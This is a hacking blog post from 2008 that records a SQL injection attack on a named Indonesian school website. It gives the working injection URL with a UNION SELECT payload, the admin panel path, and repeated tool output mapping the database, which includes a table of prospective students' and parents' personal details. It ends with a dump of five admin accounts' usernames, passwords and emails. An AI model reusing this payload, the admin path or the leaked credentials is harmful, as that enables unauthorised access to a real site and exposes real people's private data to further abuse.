viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Sunday, October 12, 2008

[SQLi] http://www.icmcipanas.sch.id

1:49 AM Posted by viperfx07 No comments


Tool: schemafuzz.py v5.0
Admin loc --> http://www.icmcipanas.sch.id/cpanel/admin.php
Admin usr:pwd --> see above pic.
Dump:
[+] URL:http://www.icmcipanas.sch.id/news.php?p=detn&kode=46+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 21:22:53
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t41437_icm
User: t41437_icm@localhost
Version: 5.0.32-Debian_7etch6-log

[Database]: t41437_icm
[Table: Columns]
[0]admin: id,nama,password,level,email,date,namatgs,passtgs,emailtgs
[1]alumni: id,nama,nm,email,alamat,tlp,angkatan,status,kerja,img
[2]banner: id,gambar,size
[3]berita: idnews,judul,isi,penulis,gambar,date
[4]cln_siswa: id,id_jenjang,nm_clnsiswa,jns_kelamin,tgl_lahir,bln_lahir,thn_lahir,tmp_lahir,tlp,status,almt,kota,kodepos,asl_sekolah,nm_sekolah,almt_sekolah,jenjang,nm_ayah,agm_ayah,pend_ayah,pekj_ayah,nm_ibu,agm_ibu,pend_ibu,pekj_ibu,almt_ortu,tanggal
[5]gambar: id,kategori,kode,img,status
[6]imtak: id,judul,isi,penulis,date
[7]jenjang: id,jenjang
[8]komentar: id,nama,email,tanggal,pesan
[9]kuis: idkuis,pelajaran,isi,penulis,kelas,date

[-] [21:24:25]
[-] Total URL Requests 80
[-] Done


[+] URL:http://www.icmcipanas.sch.id/news.php?p=detn&kode=46+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 21:24:40
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t41437_icm
User: t41437_icm@localhost
Version: 5.0.32-Debian_7etch6-log

[Database]: t41437_icm
[Table: Columns]
[0]admin: id,nama,password,level,email,date,namatgs,passtgs,emailtgs
[1]alumni: id,nama,nm,email,alamat,tlp,angkatan,status,kerja,img
[2]banner: id,gambar,size
[3]berita: idnews,judul,isi,penulis,gambar,date
[4]cln_siswa: id,id_jenjang,nm_clnsiswa,jns_kelamin,tgl_lahir,bln_lahir,thn_lahir,tmp_lahir,tlp,status,almt,kota,kodepos,asl_sekolah,nm_sekolah,almt_sekolah,jenjang,nm_ayah,agm_ayah,pend_ayah,pekj_ayah,nm_ibu,agm_ibu,pend_ibu,pekj_ibu,almt_ortu,tanggal
[5]gambar: id,kategori,kode,img,status
[6]imtak: id,judul,isi,penulis,date
[7]jenjang: id,jenjang
[8]komentar: id,nama,email,tanggal,pesan
[9]kuis: idkuis,pelajaran,isi,penulis,kelas,date

[-] [21:25:09]
[-] Total URL Requests 80
[-] Done


[+] URL:http://www.icmcipanas.sch.id/news.php?p=detn&kode=46+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 21:26:04
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t41437_icm
User: t41437_icm@localhost
Version: 5.0.32-Debian_7etch6-log
[+] Dumping data from database "t41437_icm" Table "admin"
[+] Column(s) ['nama', 'password', 'email', 'namatgs', 'passtgs', 'emailtgs']
[+] Number of Rows: 5

[0] mila:ciputat:milah_u@yahoo.com:NoDataInColumn:0:0:
[1] heri:adindaku:heri@yahoo.com:NoDataInColumn:0:0:
[2] aku:aku:aku@yahoo.com:NoDataInColumn:0:0:
[3] euse:eighty8:euse@icmcipanas.sch.id:NoDataInColumn:0:0:
[4] kerberos:webmaster:kerberos@icmcipanas.sch.id:NoDataInColumn:0:0:0:

[-] [21:26:07]
[-] Total URL Requests 7
[-] Done

0 comments:

Post a Comment